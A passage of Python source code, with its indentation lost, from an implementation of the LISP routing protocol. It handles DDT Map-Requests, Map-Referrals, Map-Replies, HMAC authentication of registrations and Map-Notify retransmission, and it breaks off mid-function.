def lisp_ddt_process_map_request(lisp_sockets, map_request, ecm_source, port):
#
# Lookup target EID address in DDT cache.
#
eid = map_request.target_eid
group = map_request.target_group
eid_str = lisp_print_eid_tuple(eid, group)
nonce = map_request.nonce
action = LISP_DDT_ACTION_NULL
#
# First check to see if EID is registered locally if we are a Map-Server.
# Otherwise, do DDT lookup.
#
ddt_entry = None
if (lisp_i_am_ms):
site_eid = lisp_site_eid_lookup(eid, group, False)
if (site_eid == None): return
if (site_eid.registered):
action = LISP_DDT_ACTION_MS_ACK
ttl = 1440
else:
eid, group, action = lisp_ms_compute_neg_prefix(eid, group)
action = LISP_DDT_ACTION_MS_NOT_REG
ttl = 1
#endif
else:
ddt_entry = lisp_ddt_cache_lookup(eid, group, False)
if (ddt_entry == None):
action = LISP_DDT_ACTION_NOT_AUTH
ttl = 0
lprint("DDT delegation entry not found for EID {}".format( \
green(eid_str, False)))
elif (ddt_entry.is_auth_prefix()):
#
# Check auth-prefix. That means there are no referrals.
#
action = LISP_DDT_ACTION_DELEGATION_HOLE
ttl = 15
ddt_entry_str = ddt_entry.print_eid_tuple()
lprint(("DDT delegation entry not found but auth-prefix {} " + \
"found for EID {}").format(ddt_entry_str,
green(eid_str, False)))
if (group.is_null()):
eid = lisp_ddt_compute_neg_prefix(eid, ddt_entry,
lisp_ddt_cache)
else:
group = lisp_ddt_compute_neg_prefix(group, ddt_entry,
lisp_ddt_cache)
eid = lisp_ddt_compute_neg_prefix(eid, ddt_entry,
ddt_entry.source_cache)
#endif
ddt_entry = None
else:
ddt_entry_str = ddt_entry.print_eid_tuple()
lprint("DDT delegation entry {} found for EID {}".format( \
ddt_entry_str, green(eid_str, False)))
ttl = 1440
#endif
#endif
#
# Build and return a Map-Referral message to the source of the Map-Request.
#
packet = lisp_build_map_referral(eid, group, ddt_entry, action, ttl, nonce)
nonce = map_request.nonce >> 32
if (map_request.nonce != 0 and nonce != 0xdfdf0e1d): port = LISP_CTRL_PORT
lisp_send_map_referral(lisp_sockets, packet, ecm_source, port)
return
#enddef
#
# lisp_find_negative_mask_len
#
# XOR the two addresses so we can find the first bit that is different. Then
# count the number of bits from the left that bit position is. That is the
# new mask-length. Compare to the neg-prefix mask-length we have found so
# far. If the new one is longer than the stored one so far, replace it.
#
# This function assumes the address size and the address-family are the same
# for 'eid' and 'entry_prefix'. Caller must make sure of that.
#
def lisp_find_negative_mask_len(eid, entry_prefix, neg_prefix):
diff_address = eid.hash_address(entry_prefix)
address_size = eid.addr_length() * 8
mask_len = 0
#
# The first set bit is the one that is different.
#
for mask_len in range(address_size):
bit_test = 1 << (address_size - mask_len - 1)
if (diff_address & bit_test): break
#endfor
if (mask_len > neg_prefix.mask_len): neg_prefix.mask_len = mask_len
return
#enddef
#
# lisp_neg_prefix_walk
#
# Callback routine to decide which prefixes should be considered by function
# lisp_find_negative_mask_len().
#
# 'entry' in this routine could be a lisp_ddt_entry() or a lisp_site_eid().
#
def lisp_neg_prefix_walk(entry, parms):
eid, auth_prefix, neg_prefix = parms
if (auth_prefix == None):
if (entry.eid.instance_id != eid.instance_id):
return([True, parms])
#endif
if (entry.eid.afi != eid.afi): return([True, parms])
else:
if (entry.eid.is_more_specific(auth_prefix) == False):
return([True, parms])
#endif
#endif
#
# Find bits that match.
#
lisp_find_negative_mask_len(eid, entry.eid, neg_prefix)
return([True, parms])
#enddef
#
# lisp_ddt_compute_neg_prefix
#
# Walk the DDT cache to compute the least specific prefix within the auth-
# prefix found.
#
def lisp_ddt_compute_neg_prefix(eid, ddt_entry, cache):
#
# Do not compute negative prefixes for distinguished-names or geo-prefixes.
#
if (eid.is_binary() == False): return(eid)
neg_prefix = lisp_address(eid.afi, "", 0, 0)
neg_prefix.copy_address(eid)
neg_prefix.mask_len = 0
auth_prefix_str = ddt_entry.print_eid_tuple()
auth_prefix = ddt_entry.eid
#
# Walk looking for the shortest prefix that DOES not match any site EIDs
# configured.
#
eid, auth_prefix, neg_prefix = cache.walk_cache(lisp_neg_prefix_walk,
(eid, auth_prefix, neg_prefix))
#
# Store high-order bits that are covered by the mask-length.
#
neg_prefix.mask_address(neg_prefix.mask_len)
lprint(("Least specific prefix computed from ddt-cache for EID {} " + \
"using auth-prefix {} is {}").format(green(eid.print_address(), False),
auth_prefix_str, neg_prefix.print_prefix()))
return(neg_prefix)
#enddef
#
# lisp_ms_compute_neg_prefix
#
# From the site cache and the DDT cache, compute a negative EID-prefix to not
# be shorter than a configured authoritative-prefix.
#
def lisp_ms_compute_neg_prefix(eid, group):
neg_prefix = lisp_address(eid.afi, "", 0, 0)
neg_prefix.copy_address(eid)
neg_prefix.mask_len = 0
gneg_prefix = lisp_address(group.afi, "", 0, 0)
gneg_prefix.copy_address(group)
gneg_prefix.mask_len = 0
auth_prefix = None
#
# Look for auth-prefix in DDT cache. If not found, we return the host
# based EID in a negative Map-Referral, action non-authoritative.
#
if (group.is_null()):
ddt_entry = lisp_ddt_cache.lookup_cache(eid, False)
if (ddt_entry == None):
neg_prefix.mask_len = neg_prefix.host_mask_len()
gneg_prefix.mask_len = gneg_prefix.host_mask_len()
return([neg_prefix, gneg_prefix, LISP_DDT_ACTION_NOT_AUTH])
#endif
cache = lisp_sites_by_eid
if (ddt_entry.is_auth_prefix()): auth_prefix = ddt_entry.eid
else:
ddt_entry = lisp_ddt_cache.lookup_cache(group, False)
if (ddt_entry == None):
neg_prefix.mask_len = neg_prefix.host_mask_len()
gneg_prefix.mask_len = gneg_prefix.host_mask_len()
return([neg_prefix, gneg_prefix, LISP_DDT_ACTION_NOT_AUTH])
#endif
if (ddt_entry.is_auth_prefix()): auth_prefix = ddt_entry.group
group, auth_prefix, gneg_prefix = lisp_sites_by_eid.walk_cache( \
lisp_neg_prefix_walk, (group, auth_prefix, gneg_prefix))
gneg_prefix.mask_address(gneg_prefix.mask_len)
lprint(("Least specific prefix computed from site-cache for " + \
"group EID {} using auth-prefix {} is {}").format( \
group.print_address(), auth_prefix.print_prefix() if \
(auth_prefix != None) else "'not found'",
gneg_prefix.print_prefix()))
cache = ddt_entry.source_cache
#endif
#
# Return the auth-prefix if we found it in the DDT cache.
#
action = LISP_DDT_ACTION_DELEGATION_HOLE if (auth_prefix != None) else \
LISP_DDT_ACTION_NOT_AUTH
#
# Walk looking for the shortest prefix that DOES not match any site EIDs
# configured.
#
eid, auth_prefix, neg_prefix = cache.walk_cache(lisp_neg_prefix_walk,
(eid, auth_prefix, neg_prefix))
#
# Store high-order bits that are covered by the mask-length.
#
neg_prefix.mask_address(neg_prefix.mask_len)
lprint(("Least specific prefix computed from site-cache for EID {} " + \
"using auth-prefix {} is {}").format( \
green(eid.print_address(), False),
auth_prefix.print_prefix() if (auth_prefix != None) else \
"'not found'", neg_prefix.print_prefix()))
return([neg_prefix, gneg_prefix, action])
#enddef
#
# lisp_ms_send_map_referral
#
# This function is for a Map-Server to send a Map-Referral to a requesting
# node.
#
def lisp_ms_send_map_referral(lisp_sockets, map_request, ecm_source, port,
action, eid_prefix, group_prefix):
eid = map_request.target_eid
group = map_request.target_group
nonce = map_request.nonce
if (action == LISP_DDT_ACTION_MS_ACK): ttl = 1440
#
# Build Map-Server specific Map-Referral.
#
map_referral = lisp_map_referral()
map_referral.record_count = 1
map_referral.nonce = nonce
packet = map_referral.encode()
map_referral.print_map_referral()
incomplete = False
#
# Figure out what action code, EID-prefix, and ttl to return in the EID-
# record. Temporary return requested prefix until we have lisp_ms_compute_
# neg_prefix() working.
#
if (action == LISP_DDT_ACTION_SITE_NOT_FOUND):
eid_prefix, group_prefix, action = lisp_ms_compute_neg_prefix(eid,
group)
ttl = 15
#endif
if (action == LISP_DDT_ACTION_MS_NOT_REG): ttl = 1
if (action == LISP_DDT_ACTION_MS_ACK): ttl = 1440
if (action == LISP_DDT_ACTION_DELEGATION_HOLE): ttl = 15
if (action == LISP_DDT_ACTION_NOT_AUTH): ttl = 0
is_ms_peer = False
rloc_count = 0
ddt_entry = lisp_ddt_cache_lookup(eid, group, False)
if (ddt_entry != None):
rloc_count = len(ddt_entry.delegation_set)
is_ms_peer = ddt_entry.is_ms_peer_entry()
ddt_entry.map_referrals_sent += 1
#endif
#
# Conditions when the incomplete bit should be set in the Map-Referral.
#
if (action == LISP_DDT_ACTION_NOT_AUTH): incomplete = True
if (action in (LISP_DDT_ACTION_MS_REFERRAL, LISP_DDT_ACTION_MS_ACK)):
incomplete = (is_ms_peer == False)
#endif
#
# Store info in EID-record.
#
eid_record = lisp_eid_record()
eid_record.rloc_count = rloc_count
eid_record.authoritative = True
eid_record.action = action
eid_record.ddt_incomplete = incomplete
eid_record.eid = eid_prefix
eid_record.group= group_prefix
eid_record.record_ttl = ttl
packet += eid_record.encode()
eid_record.print_record(" ", True)
#
# Build referral-set.
#
if (rloc_count != 0):
for ddt_node in ddt_entry.delegation_set:
rloc_record = lisp_rloc_record()
rloc_record.rloc = ddt_node.delegate_address
rloc_record.priority = ddt_node.priority
rloc_record.weight = ddt_node.weight
rloc_record.mpriority = 255
rloc_record.mweight = 0
rloc_record.reach_bit = True
packet += rloc_record.encode()
rloc_record.print_record(" ")
#endfor
#endif
#
# Build packet and send Map-Referral message to the source of the
# Map-Request.
#
if (map_request.nonce != 0): port = LISP_CTRL_PORT
lisp_send_map_referral(lisp_sockets, packet, ecm_source, port)
return
#enddef
#
# lisp_send_negative_map_reply
#
# Send a negative Map-Reply. This is one with a specific action code and zero
# RLOCs in the locator-set.
#
def lisp_send_negative_map_reply(sockets, eid, group, nonce, dest, port, ttl,
xtr_id, pubsub):
lprint("Build negative Map-Reply EID-prefix {}, nonce 0x{} to ITR {}". \
format(lisp_print_eid_tuple(eid, group), lisp_hex_string(nonce),
red(dest.print_address(), False)))
action = LISP_NATIVE_FORWARD_ACTION if group.is_null() else \
LISP_DROP_ACTION
#
# If this is a crypto-EID, return LISP_SEND_MAP_REQUEST_ACTION.
#
if (lisp_get_eid_hash(eid) != None):
action = LISP_SEND_MAP_REQUEST_ACTION
#endif
packet = lisp_build_map_reply(eid, group, [], nonce, action, ttl, None,
None, False, False)
#
# Send Map-Notify if this Map-Request is a subscribe-request.
#
if (pubsub):
lisp_process_pubsub(sockets, packet, eid, dest, port, nonce, ttl,
xtr_id)
else:
lisp_send_map_reply(sockets, packet, dest, port)
#endif
return
#enddef
#
# lisp_retransmit_ddt_map_request
#
# Have the Map-Resolver transmit a DDT Map-Request.
#
def lisp_retransmit_ddt_map_request(mr):
seid_str = mr.mr_source.print_address()
deid_str = mr.print_eid_tuple()
nonce = mr.nonce
#
# Get referral-node for who we sent Map-Request to last time. We need
# to increment, the no-response timer.
#
if (mr.last_request_sent_to):
last_node = mr.last_request_sent_to.print_address()
ref = lisp_referral_cache_lookup(mr.last_cached_prefix[0],
mr.last_cached_prefix[1], True)
if (ref and ref.referral_set.has_key(last_node)):
ref.referral_set[last_node].no_responses += 1
#endif
#endif
#
# Did we reach the max number of retries? We are giving up since no
# Map-Notify-Acks have been received.
#
if (mr.retry_count == LISP_MAX_MAP_NOTIFY_RETRIES):
lprint("DDT Map-Request retry limit reached for EID {}, nonce 0x{}". \
format(green(deid_str, False), lisp_hex_string(nonce)))
mr.dequeue_map_request()
return
#endif
mr.retry_count += 1
s = green(seid_str, False)
d = green(deid_str, False)
lprint("Retransmit DDT {} from {}ITR {} EIDs: {} -> {}, nonce 0x{}". \
format(bold("Map-Request", False), "P" if mr.from_pitr else "",
red(mr.itr.print_address(), False), s, d,
lisp_hex_string(nonce)))
#
# Do referral lookup and send the DDT Map-Request again.
#
lisp_send_ddt_map_request(mr, False)
#
# Restart retransmit timer.
#
mr.retransmit_timer = threading.Timer(LISP_DDT_MAP_REQUEST_INTERVAL,
lisp_retransmit_ddt_map_request, [mr])
mr.retransmit_timer.start()
return
#enddef
#
# lisp_get_referral_node
#
# Get a referral-node of highest priority that is in the up state. Returns
# class lisp_referral_node().
#
def lisp_get_referral_node(referral, source_eid, dest_eid):
#
# Build list of high-priority up referral-nodes.
#
ref_set = []
for ref_node in referral.referral_set.values():
if (ref_node.updown == False): continue
if (len(ref_set) == 0 or ref_set[0].priority == ref_node.priority):
ref_set.append(ref_node)
elif (ref_set[0].priority > ref_node.priority):
ref_set = []
ref_set.append(ref_node)
#endif
#endfor
ref_count = len(ref_set)
if (ref_count == 0): return(None)
hashval = dest_eid.hash_address(source_eid)
hashval = hashval % ref_count
return(ref_set[hashval])
#enddef
#
# lisp_send_ddt_map_request
#
# Send a DDT Map-Request based on a EID lookup in the referral cache.
#
def lisp_send_ddt_map_request(mr, send_to_root):
lisp_sockets = mr.lisp_sockets
nonce = mr.nonce
itr = mr.itr
mr_source = mr.mr_source
eid_str = mr.print_eid_tuple()
#
# Check if the maximum allowable Map-Requests have been sent for this
# map-request-queue entry.
#
if (mr.send_count == 8):
lprint("Giving up on map-request-queue entry {}, nonce 0x{}".format( \
green(eid_str, False), lisp_hex_string(nonce)))
mr.dequeue_map_request()
return
#endif
#
# If caller wants us to use the root versus best match lookup. We only
# so this once per Map-Request queue entry.
#
if (send_to_root):
lookup_eid = lisp_address(LISP_AFI_NONE, "", 0, 0)
lookup_group = lisp_address(LISP_AFI_NONE, "", 0, 0)
mr.tried_root = True
lprint("Jumping up to root for EID {}".format(green(eid_str, False)))
else:
lookup_eid = mr.eid
lookup_group = mr.group
#endif
#
# Do longest match on EID into DDT referral cache.
#
referral = lisp_referral_cache_lookup(lookup_eid, lookup_group, False)
if (referral == None):
lprint("No referral cache entry found")
lisp_send_negative_map_reply(lisp_sockets, lookup_eid, lookup_group,
nonce, itr, mr.sport, 15, None, False)
return
#endif
ref_str = referral.print_eid_tuple()
lprint("Found referral cache entry {}, referral-type: {}".format(ref_str,
referral.print_referral_type()))
ref_node = lisp_get_referral_node(referral, mr_source, mr.eid)
if (ref_node == None):
lprint("No reachable referral-nodes found")
mr.dequeue_map_request()
lisp_send_negative_map_reply(lisp_sockets, referral.eid,
referral.group, nonce, itr, mr.sport, 1, None, False)
return
#endif
lprint("Send DDT Map-Request to {} {} for EID {}, nonce 0x{}". \
format(ref_node.referral_address.print_address(),
referral.print_referral_type(), green(eid_str, False),
lisp_hex_string(nonce)))
#
# Encapsulate Map-Request and send out.
#
to_ms = (referral.referral_type == LISP_DDT_ACTION_MS_REFERRAL or
referral.referral_type == LISP_DDT_ACTION_MS_ACK)
lisp_send_ecm(lisp_sockets, mr.packet, mr_source, mr.sport, mr.eid,
ref_node.referral_address, to_ms=to_ms, ddt=True)
#
# Do some stats.
#
mr.last_request_sent_to = ref_node.referral_address
mr.last_sent = lisp_get_timestamp()
mr.send_count += 1
ref_node.map_requests_sent += 1
return
#enddef
#
# lisp_mr_process_map_request
#
# Process a Map-Request received by an ITR. We need to forward this Map-Request
# to the longest matched referral from the referral-cache.
#
def lisp_mr_process_map_request(lisp_sockets, packet, map_request, ecm_source,
sport, mr_source):
eid = map_request.target_eid
group = map_request.target_group
deid_str = map_request.print_eid_tuple()
seid_str = mr_source.print_address()
nonce = map_request.nonce
s = green(seid_str, False)
d = green(deid_str, False)
lprint("Received Map-Request from {}ITR {} EIDs: {} -> {}, nonce 0x{}". \
format("P" if map_request.pitr_bit else "",
red(ecm_source.print_address(), False), s, d,
lisp_hex_string(nonce)))
#
# Queue the Map-Request. We need to reliably transmit it.
#
mr = lisp_ddt_map_request(lisp_sockets, packet, eid, group, nonce)
mr.packet = packet
mr.itr = ecm_source
mr.mr_source = mr_source
mr.sport = sport
mr.from_pitr = map_request.pitr_bit
mr.queue_map_request()
lisp_send_ddt_map_request(mr, False)
return
#enddef
#
# lisp_process_map_request
#
# Process received Map-Request as a Map-Server or an ETR.
#
def lisp_process_map_request(lisp_sockets, packet, ecm_source, ecm_port,
mr_source, mr_port, ddt_request, ttl, timestamp):
orig_packet = packet
map_request = lisp_map_request()
packet = map_request.decode(packet, mr_source, mr_port)
if (packet == None):
lprint("Could not decode Map-Request packet")
return
#endif
map_request.print_map_request()
#
# If RLOC-probe request, process separately.
#
if (map_request.rloc_probe):
lisp_process_rloc_probe_request(lisp_sockets, map_request, mr_source,
mr_port, ttl, timestamp)
return
#endif
#
# Process SMR.
#
if (map_request.smr_bit):
lisp_process_smr(map_request)
#endif
#
# Process SMR-invoked Map-Request.
#
if (map_request.smr_invoked_bit):
lisp_process_smr_invoked_request(map_request)
#endif
#
# Do ETR processing of the Map-Request if we found a database-mapping.
#
if (lisp_i_am_etr):
lisp_etr_process_map_request(lisp_sockets, map_request, mr_source,
mr_port, ttl, timestamp)
#endif
#
# Do Map-Server processing of the Map-Request.
#
if (lisp_i_am_ms):
packet = orig_packet
eid, group, ddt_action = lisp_ms_process_map_request(lisp_sockets,
orig_packet, map_request, mr_source, mr_port, ecm_source)
if (ddt_request):
lisp_ms_send_map_referral(lisp_sockets, map_request, ecm_source,
ecm_port, ddt_action, eid, group)
#endif
return
#endif
#
# Map-Request is from an ITR destined to a Map-Resolver.
#
if (lisp_i_am_mr and not ddt_request):
lisp_mr_process_map_request(lisp_sockets, orig_packet, map_request,
ecm_source, mr_port, mr_source)
#endif
#
# Do DDT-node processing of the Map-Request.
#
if (lisp_i_am_ddt or ddt_request):
packet = orig_packet
lisp_ddt_process_map_request(lisp_sockets, map_request, ecm_source,
ecm_port)
#endif
return
#enddef
#
# lisp_store_mr_stats
#
# Store counter and timing stats for the map-resolver that just sent us a
# negative Map-Reply.
#
def lisp_store_mr_stats(source, nonce):
mr = lisp_get_map_resolver(source, None)
if (mr == None): return
#
# Count and record timestamp.
#
mr.neg_map_replies_received += 1
mr.last_reply = lisp_get_timestamp()
#
# For every 100 replies, reset the total_rtt so we can get a new average.
#
if ((mr.neg_map_replies_received % 100) == 0): mr.total_rtt = 0
#
# If Map-Reply matches stored nonce, then we can do an RTT calculation.
#
if (mr.last_nonce == nonce):
mr.total_rtt += (time.time() - mr.last_used)
mr.last_nonce = 0
#endif
if ((mr.neg_map_replies_received % 10) == 0): mr.last_nonce = 0
return
#enddef
#
# lisp_process_map_reply
#
# Process received Map-Reply.
#
def lisp_process_map_reply(lisp_sockets, packet, source, ttl, itr_in_ts):
global lisp_map_cache
map_reply = lisp_map_reply()
packet = map_reply.decode(packet)
if (packet == None):
lprint("Could not decode Map-Reply packet")
return
#endif
map_reply.print_map_reply()
#
# Process each EID record in Map-Reply message.
#
rloc_key_change = None
for i in range(map_reply.record_count):
eid_record = lisp_eid_record()
packet = eid_record.decode(packet)
if (packet == None):
lprint("Could not decode EID-record in Map-Reply packet")
return
#endif
eid_record.print_record(" ", False)
#
# If negative Map-Reply, see if from a Map-Resolver, do some counting
# and timing stats.
#
if (eid_record.rloc_count == 0):
lisp_store_mr_stats(source, map_reply.nonce)
#endif
multicast = (eid_record.group.is_null() == False)
#
# If this is a (0.0.0.0/0, G) with drop-action, we don't want to
# cache more-specific (S,G) entry. It is a startup timing problem.
#
if (lisp_decent_push_configured):
action = eid_record.action
if (multicast and action == LISP_DROP_ACTION):
if (eid_record.eid.is_local()): continue
#endif
#endif
#
# Some RLOC-probe Map-Replies may have no EID value in the EID-record.
# Like from RTRs or PETRs.
#
if (multicast == False and eid_record.eid.is_null()): continue
#
# Do not lose state for other RLOCs that may be stored in an already
# cached map-cache entry.
#
if (multicast):
mc = lisp_map_cache_lookup(eid_record.eid, eid_record.group)
else:
mc = lisp_map_cache.lookup_cache(eid_record.eid, True)
#endif
new_mc = (mc == None)
#
# Do not let map-cache entries from Map-Replies override gleaned
# entries.
#
if (mc == None):
glean, x, y = lisp_allow_gleaning(eid_record.eid, eid_record.group,
None)
if (glean): continue
else:
if (mc.gleaned): continue
#endif
#
# Process each RLOC record in EID record.
#
rloc_set = []
mrloc = None
for j in range(eid_record.rloc_count):
rloc_record = lisp_rloc_record()
rloc_record.keys = map_reply.keys
packet = rloc_record.decode(packet, map_reply.nonce)
if (packet == None):
lprint("Could not decode RLOC-record in Map-Reply packet")
return
#endif
rloc_record.print_record(" ")
old_rloc = None
if (mc): old_rloc = mc.get_rloc(rloc_record.rloc)
if (old_rloc):
rloc = old_rloc
else:
rloc = lisp_rloc()
#endif
#
# Copy RLOC data from record, add to locator-set. Check to see
# if the RLOC has been translated by a NAT. If so, go get the
# translated port and store in rloc entry.
#
port = rloc.store_rloc_from_record(rloc_record, map_reply.nonce,
source)
rloc.echo_nonce_capable = map_reply.echo_nonce_capable
if (rloc.echo_nonce_capable):
addr_str = rloc.rloc.print_address_no_iid()
if (lisp_get_echo_nonce(None, addr_str) == None):
lisp_echo_nonce(addr_str)
#endif
#endif
#
# Add itr-in timestamp if telemetry data included in RLOC record..
#
if (rloc.json):
if (lisp_is_json_telemetry(rloc.json.json_string)):
js = rloc.json.json_string
js = lisp_encode_telemetry(js, ii=itr_in_ts)
rloc.json.json_string = js
#endif
#endif
#
# Process state for RLOC-probe reply from this specific RLOC. And
# update RLOC state for map-cache entry. Ignore an RLOC with a
# different address-family of the recieved packet. The ITR really
# doesn't know it can reach the RLOC unless it probes for that
# address-family.
#
if (map_reply.rloc_probe and rloc_record.probe_bit):
if (rloc.rloc.afi == source.afi):
lisp_process_rloc_probe_reply(rloc, source, port,
map_reply, ttl, mrloc)
#endif
if (rloc.rloc.is_multicast_address()): mrloc = rloc
#endif
#
# Append to rloc-set array to be stored in map-cache entry.
#
rloc_set.append(rloc)
#
# Did keys change for thie RLOC, flag it if so.
#
if (lisp_data_plane_security and rloc.rloc_recent_rekey()):
rloc_key_change = rloc
#endif
#endfor
#
# If the map-cache entry is for an xTR behind a NAT, we'll find an
# RTR RLOC (which is priority 254). Store private RLOCs that may
# come along with the RTR RLOC because the destination RLOC could
# be behind the same NAT as this ITR. This ITR, however could be
# behind another NAT or in public space. We want to mark the
# private address RLOC unreachable for the two later cases.
#
if (map_reply.rloc_probe == False and lisp_nat_traversal):
new_set = []
log_set = []
for rloc in rloc_set:
#
# Set initial state for private RLOCs to UNREACH and test
# with RLOC-probes if up behind same NAT.
#
if (rloc.rloc.is_private_address()):
rloc.priority = 1
rloc.state = LISP_RLOC_UNREACH_STATE
new_set.append(rloc)
log_set.append(rloc.rloc.print_address_no_iid())
continue
#endif
#
# RTR should not put RTR RLOC in map-cache. But xTRs do. None
# RTR RLOCs should only go in the RTR map-cache.
#
if (rloc.priority == 254 and lisp_i_am_rtr == False):
new_set.append(rloc)
log_set.append(rloc.rloc.print_address_no_iid())
#endif
if (rloc.priority != 254 and lisp_i_am_rtr):
new_set.append(rloc)
log_set.append(rloc.rloc.print_address_no_iid())
#endif
#endfor
if (log_set != []):
rloc_set = new_set
lprint("NAT-traversal optimized RLOC-set: {}".format(log_set))
#endif
#endif
#
# If any RLOC-records do not have RLOCs, don't put them in the map-
# cache.
#
new_set = []
for rloc in rloc_set:
if (rloc.json != None): continue
new_set.append(rloc)
#endfor
if (new_set != []):
count = len(rloc_set) - len(new_set)
lprint("Pruning {} no-address RLOC-records for map-cache".format( \
count))
rloc_set = new_set
#endif
#
# If this is an RLOC-probe reply and the RLOCs are registered with
# merge semantics, this Map-Reply may not include the other RLOCs.
# In this case, do not wipe out the other RLOCs. Get them from the
# existing entry.
#
if (map_reply.rloc_probe and mc != None): rloc_set = mc.rloc_set
#
# If we are overwriting the rloc-set cached in the map-cache entry,
# then remove the old rloc pointers from the RLOC-probe list.
#
rloc_set_change = new_mc
if (mc and rloc_set != mc.rloc_set):
mc.delete_rlocs_from_rloc_probe_list()
rloc_set_change = True
#endif
#
# Add to map-cache. If this is a replace, save uptime.
#
uptime = mc.uptime if (mc) else None
if (mc == None):
mc = lisp_mapping(eid_record.eid, eid_record.group, rloc_set)
mc.mapping_source = source
#
# If this is a multicast map-cache entry in an RTR, set map-cache
# TTL small so Map-Requests can be sent more often to capture
# RLE changes.
#
if (lisp_i_am_rtr and eid_record.group.is_null() == False):
mc.map_cache_ttl = LISP_MCAST_TTL
else:
mc.map_cache_ttl = eid_record.store_ttl()
#endif
mc.action = eid_record.action
mc.add_cache(rloc_set_change)
#endif
add_or_replace = "Add"
if (uptime):
mc.uptime = uptime
mc.refresh_time = lisp_get_timestamp()
add_or_replace = "Replace"
#endif
lprint("{} {} map-cache with {} RLOCs".format(add_or_replace,
green(mc.print_eid_tuple(), False), len(rloc_set)))
#
# If there were any changes to the RLOC-set or the keys for any
# existing RLOC in the RLOC-set, tell the external data-plane.
#
if (lisp_ipc_dp_socket and rloc_key_change != None):
lisp_write_ipc_keys(rloc_key_change)
#endif
#
# Send RLOC-probe to highest priority RLOCs if this is a new map-cache
# entry. But if any of the RLOCs were used before in other map-cache
# entries, no need to send RLOC-probes.
#
if (new_mc):
probe = bold("RLOC-probe", False)
for rloc in mc.best_rloc_set:
addr_str = red(rloc.rloc.print_address_no_iid(), False)
lprint("Trigger {} to {}".format(probe, addr_str))
lisp_send_map_request(lisp_sockets, 0, mc.eid, mc.group, rloc)
#endfor
#endif
#endfor
return
#enddef
#
# lisp_compute_auth
#
# Create HMAC hash from packet contents store in lisp_map_register() and
# encode in packet buffer.
#
def lisp_compute_auth(packet, map_register, password):
if (map_register.alg_id == LISP_NONE_ALG_ID): return(packet)
packet = map_register.zero_auth(packet)
hashval = lisp_hash_me(packet, map_register.alg_id, password, False)
#
# Store packed hash value in lisp_map_register().
#
map_register.auth_data = hashval
packet = map_register.encode_auth(packet)
return(packet)
#enddef
#
# lisp_hash_me
#
# Call HMAC hashing code from multiple places. Returns hash value.
#
def lisp_hash_me(packet, alg_id, password, do_hex):
if (alg_id == LISP_NONE_ALG_ID): return(True)
if (alg_id == LISP_SHA_1_96_ALG_ID):
hashalg = hashlib.sha1
#endif
if (alg_id == LISP_SHA_256_128_ALG_ID):
hashalg = hashlib.sha256
#endif
if (do_hex):
hashval = hmac.new(password, packet, hashalg).hexdigest()
else:
hashval = hmac.new(password, packet, hashalg).digest()
#endif
return(hashval)
#enddef
#
# lisp_verify_auth
#
# Compute sha1 or sha2 hash over Map-Register packet and compare with one
# transmitted in packet that is stored in class lisp_map_register.
#
def lisp_verify_auth(packet, alg_id, auth_data, password):
if (alg_id == LISP_NONE_ALG_ID): return(True)
hashval = lisp_hash_me(packet, alg_id, password, True)
matched = (hashval == auth_data)
#
# Print differences if hashes if they do not match.
#
if (matched == False):
lprint("Hashed value: {} does not match packet value: {}".format( \
hashval, auth_data))
#endif
return(matched)
#enddef
#
# lisp_retransmit_map_notify
#
# Retransmit the already build Map-Notify message.
#
def lisp_retransmit_map_notify(map_notify):
dest = map_notify.etr
port = map_notify.etr_port
#
# Did we reach the max number of retries? We are giving up since no
# Map-Notify-Acks have been received.
#
if (map_notify.retry_count == LISP_MAX_MAP_NOTIFY_RETRIES):
lprint("Map-Notify with nonce 0x{} retry limit reached for ETR {}". \
format(map_notify.nonce_key, red(dest.print_address(), False)))
key = map_notify.nonce_key
if (lisp_map_notify_queue.has_key(key)):
map_notify.retransmit_timer.cancel()
lprint("Dequeue Map-Notify from retransmit queue, key is: {}". \
format(key))
try:
lisp_map_notify_queue.pop(key)
except:
lprint("Key not found in Map-Notify queue")
#endtry
#endif
return
#endif
lisp_sockets = map_notify.lisp_sockets
map_notify.retry_count += 1
lprint("Retransmit {} with nonce 0x{} to xTR {}, retry {}".format( \
bold("Map-Notify", False), map_notify.nonce_key,
red(dest.print_address(), False), map_notify.retry_count))
lisp_send_map_notify(lisp_sockets, map_notify.packet, dest, port)
if (map_notify.site): map_notify.site.map_notifies_sent += 1
#
# Restart retransmit timer.
#
map_notify.retransmit_timer = threading.Timer(LISP_MAP_NOTIFY_INTERVAL,
lisp_retransmit_map_notify, [map_notify])
map_notify.retransmit_timer.start()
return
#enddef
#
# lisp_send_merged_map_notify
#
# Send Map-Notify with a merged RLOC-set to each ETR in the RLOC-set.
#
def lisp_send_merged_map_notify(lisp_sockets, parent, map_register,
eid_record):
#
# Build EID-record once.
#
eid_record.rloc_count = len(parent.registered_rlocs)
packet_record = eid_record.encode()
eid_record.print_record("Merged Map-Notify ", False)
#
# Buld RLOC-records for merged RLOC-set.
#
for xtr in parent.registered_rlocs:
rloc_record = lisp_rloc_record()
rloc_record.store_rloc_entry(xtr)
packet_record += rloc_record.encode()
rloc_record.print_record(" ")
del(rloc_record)
#endfor
#
# Build Map-Notify for each xTR that needs to receive the Map-Notify.
#
for xtr in parent.registered_rlocs:
dest = xtr.rloc
map_notify = lisp_map_notify(lisp_sockets)
map_notify.record_count = 1
key_id = map_register.key_id
map_notify.key_id = key_id
map_notify.alg_id = map_register.alg_id
map_notify.auth_len = map_register.auth_len
map_notify.nonce = map_register.nonce
map_notify.nonce_key = lisp_hex_string(map_notify.nonce)
map_notify.etr.copy_address(dest)
map_notify.etr_port = map_register.sport
map_notify.site = parent.site
packet = map_notify.encode(packet_record, parent.site.auth_key[key_id])
map_notify.print_notify()
#
# Put Map-Notify state on retransmission queue.
#
key = map_notify.nonce_key
if (lisp_map_notify_queue.has_key(key)):
remove = lisp_map_notify_queue[key]
remove.retransmit_timer.cancel()
del(remove)
#endif
lisp_map_notify_queue[key] = map_notify
#
# Send out.
#
lprint("Send merged Map-Notify to ETR {}".format( \
red(dest.print_address(), False)))
lisp_send(lisp_sockets, dest, LISP_CTRL_PORT, packet)
parent.site.map_notifies_sent += 1
#
# Set retransmit timer.
#
map_notify.retransmit_timer = threading.Timer(LISP_MAP_NOTIFY_INTERVAL,
lisp_retransmit_map_notify, [map_notify])
map_notify.retransmit_timer.start()
#endfor
return
#enddef
#
# lisp_build_map_notify
#
# Setup retransmission queue entry to send the first Map-Notify.
#
def lisp_build_map_notify(lisp_sockets, eid_records, eid_list, record_count,
source, port, nonce, key_id, alg_id, auth_len, site, map_register_ack):
key = lisp_hex_string(nonce) + source.print_address()
#
# If we are already sending Map-Notifies for the 2-tuple, no need to
